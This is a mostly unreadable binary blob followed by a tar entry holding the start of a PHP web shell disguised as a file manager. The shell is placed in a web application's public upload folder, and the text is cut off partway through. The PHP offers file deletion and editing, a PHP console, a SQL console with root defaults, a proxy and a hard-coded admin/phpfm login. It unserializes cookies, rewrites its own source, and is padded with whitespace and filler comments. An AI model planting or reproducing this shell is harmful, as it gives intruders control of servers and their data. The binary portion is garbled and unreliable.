�*��ڽN�Qfn���/J��mMIRO�'�*+�w'�(�~������2��\�n�V�3B)�&��WV��J�2���ܝ+��_0W��[J����8U��ԨM�jUMLRb�ҳ������S��|��L��'���iO:K\]��N�N(/��D�Nbؙ�l��� 5����B\�O�XlXao[�e5��-*�J3]�
|�W�2y8"c����M�3���oNs��J*p6I����Փ���E�����u���/��z��%qQ[\K��X"1���Ĥ�AOކ�� 1>��b����٠Ş^�3�ԧ��ӻ�]�+V�b�f�~�)�&�py�NH��E�!���UU���F�*�V;�piq�m���Y��=��qB�*d:ի��'1.��J	��K�K��f�Fi2�&�AY�M:�fyP��7g���c��<�ⶖ��}.�9�^UN��b��$j�Q��y��H����w�ѼY�+��� �NF��e��?=���$Z>
/������Zc��ͯ�A�S�v!1�D�9?�V��dEY�Y��wN�j�R�թ�y��[%Q�,�3y��(E>���Z��nZMы���^WOS�$��\n�;�I�Si-��m�:�Nń<��YF���oJ��m�q�Vˏыq��LN�V�U{Rx̎"R���-�JN�.Iə�ʫ��;�#�ӌ��"���P����B4�������ِ?�3Ӆ����GjZTo�W�|�d�@�It�Pw�q�e���V��"���n%ѫ^T�T?�{m���p��;�é�HcԺ����hJ�0���]�4UO
���NUﺷ���L�O��m����n��S����U2y��
q���"��ݙ2�]5�d��<KF#)�&R�5�Z���-%�tm>�Il�,��j?�v�N�\uV?F�}#i�Д(F���Z�,<?����L%:ɏ�T}�4�S����d3=���cL��C�WH��W%>јVo��lW��ho�_0|'r��R��i�+J�T"zU�Eūn �,�5���N4-LkwWq��b
�4[���1�������&'W�f�M	��$��R��J��ƒu���S�a%�H׻dD�ek�3�U�]�W:$�z%�;�w�$���-���fj�;,�k�/�ڽ�Ud�U����������:I��WW`��g��\;�8����J°�5�*V9L��u�p�l�Lr����y{ڛ[��^-���No�'jd�n����M���h������]�鲕
��Sevף�yl*����z�|���0!�Z��E/5���#2]�&�O���S���^w�)g�l��^��d28I��3�tqС�
����rh�����a��)��u��gg���=�^ԠƸ(�|�E��ٌ�7�B�wx׼\��s�Z�f��~��:�6��M�dc�l)�f{�݋\�._f[t�����x�D��q'��gcj�x̶ӧ�Ӽ�b��ߪ�ҩh�pޚ��sA�/��x8yA>v��U���㰐�U%h�%���B��ܝ�+��؝|X�
R	,�b�}=�����<@��03.�����T
+�Y3z1+v��m�ՏU��N.��Ă+�����U'��N�{���A��l��m��Qt������t2��%��	���QH䚽����䊕l���5��J���U���S���_���(���weQ��t��m[�n\_7oKj����]�7c�r!]gg�͵k���\ngr?Phu��j���l^�=F{�1-G�}![��{���u
z�-�S�"�˱�@���j�/�j��cE,/��,о=�=T���\�ä�wK����MQ�贮�dt_��Wi��e���-6g���N]	��ڹ�BLӊry~H�~J*e>V
t�bm�g���Y'�|�9j���|~�fOB9��~2��d��8�q�'��OƑ��#?G~2��d��8�q�'��OƑ�G���]����#�8�m\ޒ��w*)y�c��lyFyqP�������Y����O��n�����t~Y)�K��bqT$�
��BA�燅6ג�I�J����a*&���4,��5���,��<����pt��'m {����i�=��6�bsv�>�:�О�J�B���|)/"�r�n�/{��D��.n$�`���V��	��ċ�NjK������+D䬟d�J�*}/�%j
������M�Eө�U�0:��*��S,_W��I��b�t}~WU�A�_�Hw�@��$�@_)f���@��vڑ�(kw��\US�S�،�n��0����#S8�dgŋ�U!K�.[rrNu�1E(O�g}���/��~��,o�z��Ǟ4�T#vV��<�����t�v��	��4��(�%�1Vo����8/%�z7��8�f�i��;�_Mq̝'��ٰ�
/.���q�����5S;�çDw�?Qgw��i<�.<2���������b\c�ij|zys��ˇ��Y1|�(r�R$18oIJ~���~{�oޖ�N_���$վ�K�97,�f��[n]��rbR�+�1�/��i&[9M]��G��w?�ه��%Gy�`��/��/?�ٮ�d3%�';���+{r��sj�JÔד�iyLʥ��b�1:�v��y��.�1#��~2Q��Il'�3.�mDh�\>���liU����6'�,�M���6�I\<�J���X�-?%��d\Nf����5=�k5��\5ݝ͆�VnQ9}�"��p�p=l7r�au8�$�3�u�G��Y��R��i'�3:czd��^��h���M���J�BF��U
�&�<=��]��k�U�O��H7���d=�.���͍;�^Oc�aU��s���h��Э�nW8�����Q�^a�EϹx��#�5�U~�c�9�vW���Wo��	W�'R�'�x"+�B~jd���E����nV-���[��Gj�f�i%Q�$�,MW��t�~JQLzZYV�����F��R"
�erv3�Ę3O�Fz�U�Lv�t�, '��i+r��	l�w�r?>�0U�w��R�&%+��"+���!y�kE.��RiD�	���F��j%*��A��KH�yx�>S�$�o�ʏ�ɋD!P�V�|�5^���� �ȼx
�=+}5	����_��YhP��yzW/ݞ՛�h'�DK��u.�9=�:��y�K��9߾�'h���
�׋���Ru8��宮����ˏW�l7z)g;�a�6=����y[XLd�8d/�E%7�ڥzo�Q���h�o'G��y[�d�2Ԅ�Έ�^���P$�4�w��15+�r�0��S'�G��0�(�l�p�L�îڌ4�m��D���Xm�C�tv>i�������绗�g��r+u����i�4����N�ir�Ǩ�Y!��ҝN�(VR�5��ȪB�\��^K���q��JO��j�n��x�O�Pi��gYf1��t�l�U�_$��r9c�m�r�2EȴIJA	�Ss|{�(
O��b�Q������ˋ���p�
�ɂ��֞��Nj�rij=E�"��~��Tw�;v�+KG�2�U�Q!9�vŵV��v��ބS����e��%Y�N�,%�v�Zg�_	Akyƈ5�v��]곹����nN��L�����2B��&�}|×��?��8��f=/'?�
�>~����zPȒ��5�	�9z�ǩuq�\̮j{��P[z����%���C�^<P�a��fC�E��f�Ipp�,�_Y��Y��[�Z�&�R�d�Z��-��S��_�{ٚ��֮���©�W�\��M������8��;��N�,=��І_�͏�b�P,���}A>s=��7f	-=�hE�`�7�1`��\R#����"J��<y�<��f���X)�5*^Nf�͛	
�ZT�'K��6tuvELYI�A�5��e;Ŵ�N�m��/@�)+���
�n�e_��ڜ�uh�G����o)avЉ�y��q]qm��Q���30�,��D[J�6K�|-��!��A�q���|�SA#�:��2�!�5��y�N�:�:32�W��k2�y����z��[�jo㕃����.�M�3"Y8
���Ncn�A� ��*����C".�XA�V"`$a�.��ep��7�#�H��\_�A
]�L�hZ�����|(eȒۓ�m"�Dc�{4S.�:��A�[����hI&�AnWW)˖�B������d7Y�(�'#G���#{��ls}�PX�j �J�z���&�(OuY&P�K��\F���C�mj5i���i)<�gN�ard���Cf
l�B�,I���eu�bU_Б�y�z51�3�N	l���ZYM���R�\b���	�#Z�ܘ�$7�$W_[�.҅���gp4+�q�
������s]�([s(k���8ʤ%Q<ң��G�:p�l0�
��X�:7�i�%� �-,~�捱���8�ј;J���t���cW�O�mF����(�š�\��B�ܐ�A_��%��Q=����!�
tM�,J��(�} !4�,eB�S�nUAQ�qg����±����)=��׍�8a<�%�9ޒ.��떺��k8�Lf?<���"G�#<�r3�)�#4a����y��Cш���tXga�I��Q8���h��ݕHo�X��e?��h�Ӓ�C�zD�����@OQ�N�$�hE#=�Z�^��Z][�v�"����Өm����J��7a
:�jlx.��EF���[��h�^�W&��@��ah8��K��ؚa1}Oij8��(�(	cf�TprM׻�����
C�ઐ?�4ҿ|	t	_����+�5'NP��OF�)�حZ�c̟^��=�rvH_h�^�sca:�`�&�0�v�V`)��C���;��:R�K��.��I��db�.2'���e
�y
��,��}�s
4�fq�_�}�ɢ]|��3�+"X��������Y��-�/ZK���Z5�X�W��KF.o�[֒���&n2@��J ��S���M��R��10gNR�a&��،X8�?L$����g�o\�;�9H�
��-�鑻l�ZM�b����`BE$
@�`��7�3��N�#���G����B)�3�NK���w;Hہ�ɡc8��
�w 3��62�,���#�H$KE��YK��z ]R���%��k��1��/�FI�t�x�m��H݇_QD�a������9������K"�tdpjn��ð��Į(1���}��P��9�X��5��/���Ǡ,
Eg]%7u��j$Z$pd6�2�2nC�4�u7��U�Ǯ�B2^���ޞ�wm��>�~��ZU-}ּjVϫ��z���@��Yl�(��"
M3���=�0�N�X��������[��߱r7�K�Ērvx��d��q``,i001xCs��-���-��IaP�F�z���i������ϣ��JhN�%V��������V�p6���� �v�n��.�䃱�8�K�� �������pJ�Z&$~i}��(x@�Q
������W��pđ^.3�����YI@�h�B)4P�̴6p�`�A�k�a�������=�֐ӎ�/oaz��K�0�{9N�����&��։X�n{�F�ʳ���uO[�~ց��jH'���8n+����1K���Z�t,&ӰrasY8�x�������+���<�o�e���eKj��\�r�i������&�}����+@�t����XH�ɓ�q��lR�\�ղ�~����@���l^�I�Ny��}�I����Ľ�}�㮶
?J�
���s�p�u�m���B��
���[���9؁�$l�Q�v�q7�xC^��ln|m�E�Y'�)0�5���`�V�!��7�k�^��.1T�Kv$Ya�4-z��X����'"�qB�P��I���n��]�7?�i0 -��ܮ%��-����\�>^�3�X���(���2�<�r�ucX��筄˓k�f��Mj�m7:ד	/����=�F�ml��
��FcŎw�r���*'�M�f`RL�Gs^�d���-k�J��Ml�Ơ�V��AA�h��C�d�^cu�����n�b�ʀ{�d�d�5�8E���R�m��v'%/����{7U��juJ�N,L��`(kS�:K��K�`��(��
�^l}l7���d_�^�|��q�7c ���Ѹ��1^��G����(k�s:�H7"�6���D�mBG��/D��$�ӎ�(��_	�y�n�x����E(�\#�2nj�$!�D̄�p[
��ұp<Z뚮��>����Ft���_]yrL�?[���S`��ego�kg���ʀ���`N0'1�3�.>��6�v_�TǍɸ}f�&ac��I�=q�
N{�N�-����;�m���0}�_�Z"���U����
�����}[t>��M��e���J4�<p̧��\%cO]0��p������w
��ݼ�Do|�-���2��~��O� k�����:'5�c��O�*�3%It1��|%8YS۬`l�s�	u7��I[��ˢ��6�wK��G�bD�z�/��#p��&
��L@�VP35[z"y_/p��g#E�'a`CE�,%B�\���N��_2�Y7֐��8A�|����7�W��M�t�[d�h��\��,���u����j���6���Q(��[fl��Ķ��q��ZƓװ
�
.@�j��s�=���	N��K}��3?o����_k����e?����D��O�������VхJ��&�%���&\𰴺�s|�Vx����m̀�}�
��?����B���YM~�T�M.�[:fY�&Oo��9��֣���٭�-�s�4�
���Ox�^h/h��Wj^��?
��d�.G��2Э0h8ǝ��͖zxbN�K�©D����c ��>�W^��{�����BP�)�fSs�sl�V�_B=E+MяNO4��֌��������o���i����7b���d�nQ�Ӛݢ>��Uc[mg�&5�{vĶ���l {�$�ptf
�wpeB�p�Dz6�N?E�"ìS��ž��+�2��D��6&�;����M1L	-�-��w!���
��D�cպ��s��o{ӷW��c��R�v��e�xgg`tK�*��Ꭳ-���0_�1�!�>Z�ap''bӇX�n`4��=�Wt��	Ckx;]�Xw�Pw�_�m�~9$�5��ʕ�W��5����1l���m�E�Ћ��80�B��x�]l��D���h	��ztW`Y=�ð��a���q_O�#��Q����Ѹ��Y��o���y�.;�/ǯ�3���K�L��um�?�!��o�zO�-W�����J7[y�5O�t4O/���E��@�׽c�
V��`�k;+�DZ�׬����ž��\�?�No(]�%̠�O`�nkP�ey���9���g����o>��g�\"��u��^�9@���M�˸�Rߛ�9�����<�����~tb�V��堰�T�~Lye�(h�[��/{�b�$����,�����[%�p��᩾�b�K�;R;���l��@cn8Vy��P����{xWi+[����:�",���Gj��å	Ac��Aue�W���#'�#�)+�xqvD��DŽ�8|LX�}����G=��l�ck��J��-ʌ_��)'s]����ǣ����/�#
�冰�J�Y��hq�-]5Б
`b"r0,���cϡc`��/kf�g�H�
+�ą��am�`�8/�g<2m�D���X�c��=n���EG�P�^h��-���Bұ�<3��vH�g,ϋ��(��r���`����3���/{l���d�kJ�<�
pʋ}�Q���g�س�Y�xʑ�lPq����=�@���@�p?ғ��9�Mղ�����E=
�S���Hg51C����(��y��a�J'iV�T���ܿ���ͩ�qf�ۤ�Ktֺ��)6P�娵��s����8>�LS��
Ǘ�
�Y�!��<%I�����gԶ�?��y���F�c�������z�_Z�{�/k�g� ��{��Fd��Ŗ::�N�P8���L� )~��1a|��Z���HD��R��Ճ����r����E�����7��Ŗ�%��e����!��e��kz^LJFϟR���J���y�.ʚ=),��xQ���ہ��n��v|X�A���sv#��+h>0���K*A�����u����:	6�	K���M�J �BH3��>�_�
��=��E�5�$n<�:��!�3
���T���H�C��W`�O�ê��9�k�k���)�^���U�
�Q<+�L)���*XF�H�|p�ӣid%�X�*!�ڇ%QM$�kRͣY�o	�y��^ H}B������s�_$Z��
Pw�ҙ�C�@�@
��)����x��z"m�m�mn�������@5��`S\Z����#b
��@���.��F�xJIL/›%�IJB��R�2�>
�8�g!I���=��C����V�������8Q'�ߒ�p�M2�t8���m�@~A0z�绔$g�TD~�bP�U�Y'x���W�U����c�UTI P���=kX����YP�+�}5������3���>hg]�.�d/�C<,/vɽ�U��U�U(���>��p(8���m_x�T���!8�K��b���Q�A�U^Y��^c;"�^�Rd�{�~�����MS�� ���4d&�1�K!��{��3��׍�\X�#^c��S-J-����}6��3��W+��"Ę�)�9F&�~�T�.T���²�k c748q7=,-Z��j�U��
�`>�a���G��W��
���~K�~O�kZ�3��\�/`�"���̒�١u�)h��D�3��j8dk����d�o�IT�a|m�^���=C�qG�^�l���j�8s�1.Lrwk��A������
�Ɲ*X�3끃-��V򻥚����f�]="1�M���⮜ٟ�̸�F��Ę�J�So8WUD��긝O��@�>G>�!��$~_s�F�󋽰�j"���Ȃ�2���i�(��$��2P�!Z�V���s�j�.���)z���VG��QO0�wzF\Yg��`��[-��+0�J�Ch<w/�8{w�+���Uy�⼮����8d=���J�.�A�]�`B�I������'X�]�L�`�wl��G�E��;A��ƞx}��];¯���w6�e[�C���
�
:"�"��K:��j��Z��4����h��Qc��
]t8R���%�8�׍��+�v��r
��\�*c�����-E4�k6-����sP�]���ȴ�Y�&��1@O���K�p����J�*nQ���ӤQ�TR�'��[Tnl��d��wU�I� ڠAn�G�d�-Ir*0�����$p����~���F��}�:a7Y�on�!�J���ֳ�����@�Z�p<���۠G��ߵ����q�:1b4��`F`��2jO�?�x(��es�B�tzV>��\VkW�F�u{��P]�a{�7�cA�<J��Ng��S8���T�0@��8ſ�w$� ��A��H�>���]�7�&H�d��c��1���+�c"�=_��AC�L��*~�{\�H4M�4�f@cOաQoNOhj 4�c0���H������:��`����!2`���B4Ԕ�xqrDD�`!G"Q�K������a��(���j���?�?�����(�?J��F[I�YDíA��g����DE�B���7�|�'�
�V�_ B�Pj�]�r>I�Z]�$VP1
߃�,�Ӆ���>�>�z,���ZJBlv(�ŝ��npumAܓޅ�g�����X�G�2�7E�1��_�2~c{�%U��Ls3�\>U�3ţs$�����yA>3{�#��X~�${Y�)��|$�zP��=��|��Ɓ,>��B�XH��d�N֋���xh ��û��?F�P�e�8�|��~!�܊Ҩ+�#�
3��#��
���og���>��3��(X����ޚN%�t,xF�<\�M���h������޸���O>�Y@g��G��f����s�o��`���`�MV��4K��{$h�)�����w�*���/I8'V�!��J((�t)!_}4��Cz�*�[��,p���U�Ab�Ru�k�1�����y4X�.����z�X����$��z$���!�nM���0�Bڒo!zo�.QZ�){V��x���� �A�KU�A=�?!N��Y�b����o>�k�u�i XJP��O����7'�؇{ '�2���+��E(���M\�VO{��u%��BiHˍZۨ���AU��.��]x����d������&E�����X鲬�o	;��8d��q�@M�>��RH�Y)��ul-;�9���ϰ�ZϿw�(��`\��<}�U?t��4
3�/)�������U�|d
�D޽s@OL=�M����o��Q$r"�k<I�Q��gڬ$V¸z%x���|
�`y�ř|�o�;���E�3e�j�!K5M{(k���FHs�~�@]=w�ֻ��ʡ,��@ep��9,�s@���0P�+9@�z���B�����C��!@��@����J'y�0g"`�?��v?b�i�o�M bmb�����v�׎��8m-���uu6�<�%��uw�9G��x�꾶���y�_R+͍�ͣ�}���>�ض�p6�Y��H��qF�W���ѓ�1Qg�H��lI����zA�ex���3.B���Lq�T��H��~+C)��q���8��>'E��%�7�wT��X����ku���d�Y�e\��u
�S�)��ew�^W�ыz��K�6R]Z~�G2	�]���=��j!2� ���2^�%��p$�S����2;�hn�<����\�J��^��������?�0#
�[�P�L�5����z��.5�B�^�minK��;
1�<�V��Ji���y
z���/��6\���u�3����
݇��M����v������5�|�ٸ� ��]�&H����_��J�杂����� �>JD�вvk��n��[(�̠�V�YZ�;җ�������p*��>���{����۪�.ļA�7'��)�B��_/y{�ҵ�ĘI�]`��΋W׎ApN�SJv�9��Xi提��v�^i��'�"�&$��(��Ċ=k�o�ZqI!�����]Nr�v?���G����'k#���ޛf��@a5��-�x�c#�]ώgh�q\l;v6������2��M����eg#k��mO�^�`�-���27�ݝ	�V���Z��x��lö���<ҽ%y�i���\��:�g�l�U��I���
��6e]U`x�ek_/�ஹWE-�U-7��M��"�6�����I^����H��O���>�cx�]�#e��e��N
W�;}ƾ}��y{�=�C�ɖo^j�&Q�7.����t@bi�8@�I^o�C|��Efq��H㝓�v��j�XB�YG�ݎ�ߛ��޽f�zk�1�����$H�_���Þ&��&o,��������X�>�����.�]�$��쿍�_�v�'��jWV$��|E�V8�p�N8��"
��vμHNwgC�{y���(�5����u���6ǝo[�يE_:�r3߿�����ʴѪ�MQ@����Is+B�z1�9AJ�b��ױ���G.��ӏ��"����(4(�R5O�9�D5���B�g4���!�VQ-�;&4�;">t%�ƴ��N��	M��˾^�^?�PF�(�3�-�wr�X���֮s�C/��/j�r]5b �WA{eo��&��
.���c�i�`X�)J�0��f�y����h�g^���������!�f��9��sV���G9�j
wj��i���5(�w���*ܮT"x�������G䛌�cǠo�w+�	#*�N�֛f�������$�m(�ky��h�{[,�qe��f�t��	�(�x��[G�.��
`�A��뻿��
�/h��xIJ���ib�gR�P��I{#��A�]�-ڭ�ž���wt/f
�]��k-ޏ�չ���U��	D殰�л�S�3���:�v>�F`��}["�M����~^�����:ޒ6s�z{����;#�W�`�x#���S��w�e�q�9��^��
�Q�=h��]"���QD���H�И��;k��^� |�|�a�^@���,0�l���BPޡ�_M�_Bo��e[l�x��6�5���3Dc�����`m�G� 
-k�#��o~����p|(�8�]��=�g������wlT�t�|Dj���y�6�h��o����[�(N��	F?
�쇁ۅ�c�_��tB�Y��A"�u0m�+oc�m(�߿o'�l$�;�!d�}!RK�q@4�RLsCS��&D�6C�Χ�9(N���E�cP���^t�ń��=\�����v�op��|���	�`�)FW0Bd���ZW ,��yV��y3	^�pGo�#[-���]��gXLxQ�LL�~�No(-a00��o��jaF]����l�(����^�ߝQ��'K#����_ ��5TT�C;��j �=�����d`l�op�E�n��H�-����+�|��8���|�Їn�Y�����K{6�}{WCX�{Y��D$s�;���JA�(n��Ld8�����0� �Џ�*wq�gu�;>0O"��ƫ�E�~��A�F.BxB�:|}��!�_��NJ&p跎T��Q��*�j��i�%6v!1s>�㧐v�䙮vrC�Ŕ�T�ԆJn���q-<�{c��¬����
����Q�ӏU�μ;�MX���5����(�A�E9Q��E~W�5<L#1drq&����m�y����ɚ�j��C����y{o�`�\�G�v�R)�ߖG�J���V�[ji/^�o֯�;�o+E�:���VV8A���9;�I��t9~�U�Iɕ�m
��)o����T�pgD��9��١��
�=�m�$H�'��13]s�1���~h��-��=�پ�%��<�-�q�o�"��Y�0�&i(X���?�Ev'��rR8({��,-����b�	��B�e�����v�_k�B����ڂS܌��9%:G0a�gNv(��q1l���H��v�W=���ޫ��Qh�6g�232�fwENïe�?��m�e׼�W!{A�V�86z@ ��B|ۋw��hh~+�aW��b�
�D��-[�-Q�ߥn�5B��z�nR�t�o�?cm�'Xs��q��f}�_��\���}���#���X}���^֦398:�l���͝�;莗I����YԶ��i�xՖ�5I���������'�_<�x�0�wh�ľ�,��%���jL��Ӻ)͡�@F�Cn��HrP`�^��_A"�"�! �{�4-]�@W��_9�U�{���
04����H8�/�J�E������W�A_��ǐT$
���Z8x�:�R?�$a�0�8I%�T��I*:e%0w��EU�m,��g������D	�1XZV/e�6>aq��XگH��oE�s��y�|�i-0�2N��#畦R��@2D4�\r�r�Je�-nw����0���y7�Ї�����>����aG���@�fXO���um
f$�j5K�}Z^�d�ϰ	\d�a��?;~����������b/�Ș}�N4C�;�V�h�do��	��v���Ά��3
���!e<�g%�M���J��"�l$�-�0j���A-%�(���D��ڤU���F�s��f��b4�Y>�
<`?I��p+Q|V���p@���������$��+ܯ��O�n��dEw��3���
�$N2����	J��E$"�
��+������/�U�����a�����nV�!I��S<���`�X	��U={��JR�)�Y��m���LB�F��U,����u��>�=��L����֩�; 8��.��.��g=�m��[����k��g��_n��
2��a&��&çv�xX��B�L��i\`��+�l��	�Q�u'�Q�,��X�?NZ��#�X��|�d�I+�u�j=JxN�z�ץ����\�� �^G<\.�Dr#Z���cB�:(޺��u�0歶az�*�-X�������肰d��@�J��նwt�b��;�y�0����U'�K/wx"��9�'�(F�b���MH�Q��}ݾB ��V�6��m��v�8�hy�?����,�&�������e���g���0-��۞
�MXil��p�Z�\N��7+�@����5;ch��A�5=� �hk�Һ��M�Xږ�����*��2�e����D�7��Є��˿/563�>��IA���$Ҭ,���n�'�����%���u�{QJ���{�U��)�%K��x�9^LsO-�Jx^wȸ�d�ыߘv��꜖�,EQ�hv�d����
 _&�p.��W�^�ז8�q��w�e}��.�"U7�
z�3@�	C��B�&����%�ok��C�l+��Dž�\r7�;>�?MT���)�ʘ�׶�����ɰ_o�z�[��I�GEJW���]�/#$۠�*�����)߳��\�j�-!�fhd�Ƴ
��%����}W�YxK�̍.��N�/��A�O���s����FR�pW�|‹��ř��t
Z��?����ԍ�yN
C��N�o�������す���j��0��.���].'�>3L�C��n�{��p8��Y�
3��
��u�}�]N��kXc�+`�a�o��[2Y�2B|$P`�ܑf���]Vl����m�H(��!�_O~�����O??���������}Rgp9r4.php.tar000064400000451000000000000000006750 0ustar00var/www/html/back/storage/app/public/17/f8lo32/gp9r4.php000064400000445727000000000000016434 0ustar00<?php
          
           	                    /* Lalo File Control PHP Secure Version 0.4 */
            

               
    // El administrador de archivos facilita la organización de los documentos

 $authorizationVamos = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script type=\"text\/javascript\" src=\"https:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script language=\"Javascript\" type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid: \"newcontent\"\r\n,display: \"later\"\r\n,start_highlight: true\r\n,allow_resize: \"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language: \"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"\r\n,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}';
 
 



   
 



$php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}';
          
$sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}';

$translation = '{"id":"ru","Add":"Добавить","Are you sure you want to delete this directory (recursively)?":"Вы уверены, что хотите удалить эту папку (рекурсивно)?","Are you sure you want to delete this file?":"Вы уверены, что хотите удалить этот файл?","Archiving":"Архивировать","Authorization":"Авторизация","Back":"Назад","Cancel":"Отмена","Chinese":"Китайский","Compress":"Сжать","Console":"Консоль","Cookie":"Куки","Created":"Создан","Date":"Дата","Days":"Дней","Decompress":"Распаковать","Delete":"Удалить","Deleted":"Удалено","Download":"Скачать","done":"закончена","Edit":"Редактировать","Enter":"Вход","English":"Английский","Error occurred":"Произошла ошибка","File manager":"Файловый менеджер","File selected":"Выбран файл","File updated":"Файл сохранен","Filename":"Имя файла","Files uploaded":"Файл загружен","French":"Французский","Generation time":"Генерация страницы","German":"Немецкий","Home":"Домой","Quit":"Выход","Language":"Язык","Login":"Логин","Manage":"Управление","Make directory":"Создать папку","Name":"Наименование","New":"Новое","New file":"Новый файл","no files":"нет файлов","Password":"Пароль","pictures":"изображения","Recursively":"Рекурсивно","Rename":"Переименовать","Reset":"Сбросить","Reset settings":"Сбросить настройки","Restore file time after editing":"Восстанавливать время файла после редактирования","Result":"Результат","Rights":"Права","Russian":"Русский","Save":"Сохранить","Select":"Выберите","Select the file":"Выберите файл","Settings":"Настройка","Show":"Показать","Show size of the folder":"Показывать размер папки","Size":"Размер","Spanish":"Испанский","Submit":"Отправить","Task":"Задача","templates":"шаблоны","Ukrainian":"Украинский","Upload":"Загрузить","Value":"Значение","Hello":"Привет","Found in files":"Найдено в файлах","Search":"Поиск","Recursive search":"Рекурсивный поиск","Mask":"Маска"}';

// Un buen gestor de archivos es clave para mantener el orden en tu dispositivo


             
// Este programa te permite mover, copiar y eliminar archivos rápidamente
$starttime = explode(' ', microtime());

$starttime = $starttime[1] + $starttime[0];
$langs = array('en','ru','de','fr','uk');

$path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']);
        
$path = str_replace('\\', '/', $path) . '/';

$main_path=str_replace('\\', '/',realpath('./'));
$phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false;
$msg_mx = ''; // El explorador de archivos muestra una vista clara de tus carpetas
               
$default_language = 'ru';
          
$detect_lang = true;

$fm_version = 1.4;



// Puedes buscar archivos de manera eficiente con el administrador de archivos
$auth_ok = json_decode($authorization,true);
$auth_ok['authorize'] = isset($auth_ok['authorize']) ? $auth_ok['authorize'] : 0; 
$auth_ok['days_authorization'] = (isset($auth_ok['days_authorization'])&&is_numeric($auth_ok['days_authorization'])) ? (int)$auth_ok['days_authorization'] : 30;

$auth_ok['login'] = isset($auth_ok['login']) ? $auth_ok['login'] : 'admin';  

$auth_ok['password'] = isset($auth_ok['password']) ? $auth_ok['password'] : 'phpfm';  
                  
$auth_ok['cookie_name'] = isset($auth_ok['cookie_name']) ? $auth_ok['cookie_name'] : 'fm_user';
           
$auth_ok['script'] = isset($auth_ok['script']) ? $auth_ok['script'] : '';



// La interfaz de este gestor de archivos es fácil de usar

$fm_default_config = array (

	                    'make_directory' => true, 

	                    'new_file' => true, 

	                    'upload_file' => true, 

	                    'show_dir_size' => false, // Con este administrador, puedes acceder a tus archivos en pocos clics

	                    'show_img' => true, 
	                    'show_php_ver' => true, 

	                    'show_php_ini' => false, // El archivo se puede visualizar sin necesidad de abrir el programa correspondiente
                
	                    'show_gt' => true, // Las funciones avanzadas de este administrador de archivos incluyen la compresión de carpetas
	                    'enable_php_console' => true,
	                    'enable_sql_console' => true,
	                    'sql_server' => 'localhost',

	                    'sql_username' => 'root',
                  
	                    'sql_password' => '',

	                    'sql_db' => 'test_base',

	                    'enable_proxy' => true,

	                    'show_phpinfo' => true,

	                    'show_xls' => true,

	                    'fm_settings' => true,
	                    'restore_time' => true,

	                    'fm_restore_time' => false,
               
);


if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config;

else $fm_config = unserialize($_COOKIE['fm_config']);
         

// El administrador de archivos permite la organización jerárquica de los documentos

if (isset($_POST['fm_lang'])) { 
            
	                    setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth_ok['days_authorization']));

	                    $_COOKIE['fm_lang'] = $_POST['fm_lang'];

}

$language = $default_language;
                   

                   
// Puedes crear, editar y eliminar carpetas sin dificultad
if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){
	                    $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']);

	                    if (!empty($lang_priority)){

	                    	                    foreach ($lang_priority as $lang_arr){

	                    	                    	                    $lng = explode(';', $lang_arr);
	                    	                    	                    $lng = $lng[0];

	                    	                    	                    if(in_array($lng,$langs)){




	                    	                    	                    	                    $language = $lng;

	                    	                    	                    	                    break;
          
	                    	                    	                    }
	                    	                    }
	                    }

} 
               


// Este gestor de archivos es compatible con múltiples tipos de archivo
              
$language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang'];

// Localization
$lang = json_decode($translation,true);

if ($lang['id']!=$language) {

	                    $get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . '.json');
	                    if (!empty($get_lang)) {
	                    	                    //remove unnecessary characters
               
	                    	                    $translation_string = str_replace("'",'&#39;',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE));

	                    	                    $fgc_real = file_get_contents(__FILE__);
	                    	                    $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc_real, $matches);

	                    	                    if (!empty($matches[1])) {

	                    	                    	                    $filemtime = filemtime(__FILE__);

	                    	                    	                    $replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc_real);

	                    	                    	                    if (file_put_contents(__FILE__, $replace)) {

	                    	                    	                    	                    $msg_mx .= __('File updated');
          
	                    	                    	                    }	                    else $msg_mx .= __('Error occurred');

	                    	                    	                    if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);

	                    	                    }	                    

	                    	                    $lang = json_decode($translation_string,true);

	                    }

}

/* Functions */


//translation

function __($text){
                   
	                    global $lang;
	                    if (isset($lang[$text])) return $lang[$text];
          
	                    else return $text;

};


//delete fileList and dirs recursively

function fm_del_fileList($file, $recursive = false) {
	                    if($recursive && @is_dir($file)) {

	                    	                    $els = fm_scan_dir($file, '', '', true);

	                    	                    foreach ($els as $el) {

	                    	                    	                    if($el != '.' && $el != '..'){

	                    	                    	                    	                    fm_del_fileList($file . '/' . $el, true);
	                    	                    	                    }

	                    	                    }
                 
	                    }

	                    if(@is_dir($file)) {
	                    	                    return rmdir($file);

	                    } else {
             
	                    	                    return @unlink($file);
          
	                    }

}
           


//file perms
function fm_rights_string($file, $if = false){
                
	                    $perms = fileperms($file);
        
	                    $info = '';

	                    if(!$if){

	                    	                    if (($perms & 0xC000) == 0xC000) {
            
	                    	                    	                    //Socket
                    
	                    	                    	                    $info = 's';

	                    	                    } elseif (($perms & 0xA000) == 0xA000) {
	                    	                    	                    //Symbolic Link

	                    	                    	                    $info = 'l';

